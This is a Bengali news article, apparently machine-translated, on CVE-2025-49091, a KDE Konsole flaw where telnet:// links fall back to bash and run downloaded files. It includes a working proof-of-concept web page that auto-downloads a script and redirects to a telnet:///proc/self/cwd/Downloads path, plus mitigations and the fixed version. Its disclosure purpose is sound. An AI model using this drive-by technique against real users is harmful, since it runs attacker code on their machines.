কনসোলে গুরুতর দুর্বলতা কেবল একটি ওয়েব পৃষ্ঠা খোলার মাধ্যমে কোড কার্যকর করার অনুমতি দেয়।

দুর্বলতার

কয়েকদিন আগে একটি সম্পর্কে তথ্য প্রকাশিত হয়েছিল গুরুতর দুর্বলতা, যা "এর অধীনে চিহ্নিত করা হয়েছিলজন্য CVE-2025-49091«. এই দুর্বলতা কনসোলে আবিষ্কৃত (KDE টার্মিনাল এমুলেটর), ব্রাউজার থেকে কোনও ক্ষতিকারক ওয়েব পৃষ্ঠায় গিয়ে দূরবর্তী কোড কার্যকর করার অনুমতি দেয়।

উল্লেখ করা হয়েছে যে এই সমস্যাটি KTelnetService এবং Konsole এর একটি দুর্বল সংস্করণ যেখানে সিস্টেমগুলিকে প্রভাবিত করে ইনস্টল করা আছে, কিন্তু অন্তত একটি টেলনেট, rlogin, অথবা ssh প্রোগ্রাম ইনস্টল করা নেই। দুর্বলতাটি KDE টার্মিনাল এমুলেটর কনসোলে অবস্থিত। KDE উপদেষ্টা হিসাবে উল্লেখ করা হয়েছে, 25.04.2 এর পূর্ববর্তী কনসোল সংস্করণগুলি দুর্বল।

কনসোল স্কিমা কন্ট্রোলার থেকে URL লোড করা সমর্থন করে যেমন
টেলনেট://URL। টেলনেট যাই হোক না কেন এটি চালানো যেতে পারে
বাইনারিটি উপলব্ধ।

এই মোডে, কনসোলের একটি রুট ছিল যেখানে, যদি টেলনেট উপলব্ধ না থাকত,
সরবরাহকৃত আর্গুমেন্টের জন্য আবার bash ব্যবহার করবে; যা
হল প্রদত্ত URL। এটি একজন আক্রমণকারীকে ইচ্ছামত কোড চালানোর অনুমতি দেয়।
কোড

যখন কোনও ব্যবহারকারী একটি বহিরাগত ব্রাউজার খোলেন, তখন ব্রাউজারগুলি সাধারণত একটি বার্তা প্রদর্শন করে।
স্কিমা কন্ট্রোলার যা সন্দেহজনক মনে হতে পারে এবং ব্যবহারকারীর ইন্টারঅ্যাকশনের প্রয়োজন হতে পারে
শোষণযোগ্য হওয়া।

সমস্যার উৎস: KTelnetService এবং বিপজ্জনক URL স্কিম

গবেষকরা লক্ষ্য করেছেন যে এই দুর্বলতার পিছনে সমস্যাটি KTelnetService পরিষেবার আচরণের মধ্যে রয়েছে, যা KDE-তে ডিফল্টরূপে অন্তর্ভুক্ত। এই পরিষেবাটি telnet://, rlogin://, এবং ssh:// URL স্কিমগুলি প্রক্রিয়াকরণের জন্য দায়ী, এবং সংশ্লিষ্ট ইউটিলিটিগুলি (telnet, rlogin, অথবা ssh) ব্যবহার করে সরাসরি Konsole-এ এই লিঙ্কগুলি খোলার জন্য ডিজাইন করা হয়েছে।

তবে, যখন এই ইউটিলিটিগুলি সিস্টেমে ইনস্টল করা না থাকে তখন ত্রুটি দেখা দেয়। সেই ক্ষেত্রে, কনসোল, লিঙ্কে নির্দেশিত কমান্ডটি কার্যকর করার চেষ্টা করার সময়, /bin/bash কে বিকল্প হিসাবে ব্যবহার করে। অতএব, একজন আক্রমণকারী একটি কাস্টম লিঙ্ক তৈরি করতে পারে।

যদিও প্রথম নজরে এটি তুচ্ছ বলে মনে হচ্ছে, সমস্যাটি আরও জটিল হয়ে ওঠে কারণ আক্রমণকারী কাস্টম কমান্ড ব্যবহার করে ব্যবহারকারীর ডাউনলোড ডিরেক্টরিতে থাকা যেকোনো ফাইল এক্সিকিউট করতে পারে। অন্য কথায়, ব্যবহারকারী যদি সেই স্কিমের সাথে কোনও লিঙ্কে ক্লিক করেন তবে যেকোনো ফাইল স্বয়ংক্রিয়ভাবে এক্সিকিউট হয়ে যায়।

এটা এত বিপজ্জনক কেন?

ফায়ারফক্স এবং ক্রোমের মতো আধুনিক ব্রাউজারগুলি (তাদের ডিফল্ট সেটিংসে) ব্যবহারকারীর নিশ্চিতকরণের প্রয়োজন ছাড়াই ডাউনলোড করা ফাইলগুলি স্বয়ংক্রিয়ভাবে ~/Downloads ফোল্ডারে সংরক্ষণ করে। ডাউনলোড সম্পূর্ণ হওয়ার পরেই তারা একটি বিজ্ঞপ্তি প্রদর্শন করে।

এই আচরণ, লিনাক্স সিস্টেমে ব্রাউজারের বর্তমান ডিরেক্টরি পাথ অ্যাক্সেস করা সম্ভব হওয়ার সাথে মিলিত হয়ে, ব্যবহারকারীর অজান্তেই কনসোল থেকে স্বয়ংক্রিয়ভাবে ডাউনলোড করা ক্ষতিকারক ফাইলটি কার্যকর করার অনুমতি দেয়।

ধারণার প্রমাণ (PoC): কীভাবে দুর্বলতা কাজে লাগানো হয়

ত্রুটির বিপদ প্রদর্শনের জন্য, গবেষকরা নিম্নলিখিত জাভাস্ক্রিপ্ট কোড স্নিপেট তৈরি করেছেন, যা দেখায় যে কীভাবে একজন আক্রমণকারী একটি ওয়েব পৃষ্ঠা থেকে এই দুর্বলতাকে কাজে লাগাতে পারে:

<html>
<head>
<script type="text/javascript">

function downloadAndRedirect() {
const anchor = document.createElement('a');
anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
anchor.download = 'evil';
document.body.appendChild(anchor);
anchor.click();
document.body.removeChild(anchor);

setTimeout(() => {
window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
}, 1000);
}
</script>
</head>
<body onload="downloadAndRedirect()">
</body>
</html>

ফায়ারফক্স এবং ক্রোমে, যদি ব্যবহারকারী টেলনেট:// লিঙ্কটি গ্রহণ করে, তাহলে নিম্নলিখিতটি চালু হবে:

/usr/bin/konsole --noclose -e telnet /proc/self/cwd/Descargas/evil

এবং, যদি টেলনেট উপস্থিত না থাকে, তাহলে ক্ষতিকারক স্ক্রিপ্টটি ব্যাশ দিয়ে কার্যকর করা হবে।

অস্থায়ী প্রশমন ব্যবস্থা

প্যাচের জন্য অপেক্ষা করার সময় অথবা যদি আপনি তাৎক্ষণিকভাবে আপডেট করতে না পারেন, তাহলে সমস্যাটি কমানোর দুটি সহজ উপায় রয়েছে:

টেলনেট, rlogin এবং ssh ইউটিলিটি ইনস্টল করুন

যদি এই ইউটিলিটিগুলি উপস্থিত থাকে, তাহলে কনসোল সঠিকভাবে এগুলি চালু করবে এবং ব্যাশ ব্যবহার করবে না। এটি স্ক্রিপ্ট হিসাবে নির্বিচারে কন্টেন্ট চালানো থেকে বিরত রাখবে।

sudo apt install telnet rlogin openssh-client

KTelnetService পরিষেবা ফাইলটি মুছে ফেলুন

আপনি এই স্কিমগুলি নিবন্ধনের জন্য দায়ী ফাইলটি মুছে ফেলতে পারেন:

sudo rm /usr/share/applications/ktelnetservice6.desktop

এটি telnet://, rlogin://, অথবা ssh:// লিঙ্কগুলিকে Konsole দ্বারা স্বয়ংক্রিয়ভাবে পরিচালনা করা থেকে বিরত রাখবে।

সমাধান: কনসোল ২৫.০৪.২-এ জরুরি আপডেট

KDE Gear 25.04.2 আপডেটে অন্তর্ভুক্ত Konsole সংস্করণ 25.04.2-এ দুর্বলতাটি ঠিক করা হয়েছে। সমস্ত ব্যবহারকারী এবং সিস্টেম প্রশাসকদের অবিলম্বে আপডেট করার জন্য দৃঢ়ভাবে পরামর্শ দেওয়া হচ্ছে।

পরিশেষে, আপনি যদি এটি সম্পর্কে আরও জানতে আগ্রহী হন, আপনি বিশদ বিবরণের সাথে পরামর্শ করতে পারেন নিম্নলিখিত লিঙ্ক.


আপনার মন্তব্য দিন

আপনার ইমেল ঠিকানা প্রকাশিত হবে না। প্রয়োজনীয় ক্ষেত্রগুলি দিয়ে চিহ্নিত করা *

*

*

  1. ডেটার জন্য দায়বদ্ধ: মিগুয়েল অ্যাঞ্জেল গাটান
  2. ডেটার উদ্দেশ্য: নিয়ন্ত্রণ স্প্যাম, মন্তব্য পরিচালনা।
  3. আইনীকরণ: আপনার সম্মতি
  4. তথ্য যোগাযোগ: ডেটা আইনি বাধ্যবাধকতা ব্যতীত তৃতীয় পক্ষের কাছে জানানো হবে না।
  5. ডেটা স্টোরেজ: ওসেন্টাস নেটওয়ার্কস (ইইউ) দ্বারা হোস্ট করা ডেটাবেস
  6. অধিকার: যে কোনও সময় আপনি আপনার তথ্য সীমাবদ্ধ করতে, পুনরুদ্ধার করতে এবং মুছতে পারেন।